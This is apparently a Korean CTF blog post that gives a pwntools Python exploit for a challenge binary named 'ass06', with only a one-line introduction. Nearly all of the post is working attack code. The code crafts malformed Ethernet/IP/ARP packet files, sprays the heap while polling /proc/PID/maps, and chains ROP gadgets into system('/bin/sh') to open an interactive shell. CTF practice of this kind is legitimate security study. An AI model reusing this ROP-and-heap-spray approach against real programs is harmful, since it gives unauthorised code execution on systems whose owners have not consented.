튜기's blogggg

ass06 exploit

by St1tch

System/System 문제풀이

아는사람들은 아는문제 exploit!


from pwn import *
context.log_level = 'info'
trans_ip = lambda addr : ''.join(map(lambda x:chr(eval(x)), addr.split('.')))
trans_mac = lambda mac : ''.join(map(lambda x:x.decode('hex'), mac.split(':')))
p16 = lambda x : struct.pack('>H', x)
padd = lambda x : x.ljust(1514, 'a')
execmd = lambda cmd : subprocess.check_output(cmd, shell=True)
def custom_packet():
mac1 = trans_mac('00:0c:0f:14:15:17')
ip_p = p16(0x0800)
arp_p = p16(0x0806)
ip1 = trans_ip('128.128.0.100')
fwd_p1 = p16(0x0208) # new
fwd_p2 = p16(0x0202) # delete
fwd_p3 = p16(0x0200) # execute
ip_default = mac1 + 'a'*6 + ip_p + 'b'*16 + ip1 + 'a'*2
arp_default = mac1 + 'a'*6 + arp_p + '\x00\x01' + '\x08\x00' + '\x06\x04' + '\x00\x01' + 'a'*6
poprdi = p64(0x406853)
binsh = p64(heap + 0x10)
addr = p64(heap)
system = p64(0x4013e0)
ret = p64(0x401309)
payload = ret*160 + poprdi + binsh + system
pay1 = padd(ip_default + fwd_p1)
pay2 = padd(ip_default + fwd_p2)
pay3 = padd(ip_default + fwd_p3 + 'a'*2 + payload)
arp_pay2 = padd(arp_default + 'b'*18 + addr + 'A'*1400)
open('a','wb').write(pay1 + pay1 + pay2 + arp_pay2 + pay3)
log.success('Success making payload.')
def spray(addr):
s.sendlineafter('>>', '2')
s.sendlineafter('>>', '2')
p = log.progress('target addr = {}, spraying....'.format(hex(heap)))
for cnt in range(100000):
p.status(str(cnt+1))
if (cnt % 1000) == 0:
res = execmd('cat /proc/{}/maps | grep heap'.format(pid))
print res
if int(re.findall('[\w]{8}',res)[1], 16) > heap:
p.success('spray success!')
s.clean(0.0001)
break
s.send((('1\n'*5 + '/bin/sh;'+'#'*8 + p32(addr) + '\n')*8 + '2\n'*8)*20)
s.clean(0.0001)
if __name__ == '__main__':
heap = 0x03101000
custom_packet()
s = process(['./ass06', './a', './a', './a'])
pid = util.proc.pidof(s)[0]
pause()
spray(0x4029b5)
s.sendline('3')
s.interactive()
view raw exploit.py hosted with ❤ by GitHub
저작자표시 비영리 변경금지
블로그의 프로필 사진

블로그의 정보

튜기's blogg(st1tch)

St1tch

활동하기

티스토리툴바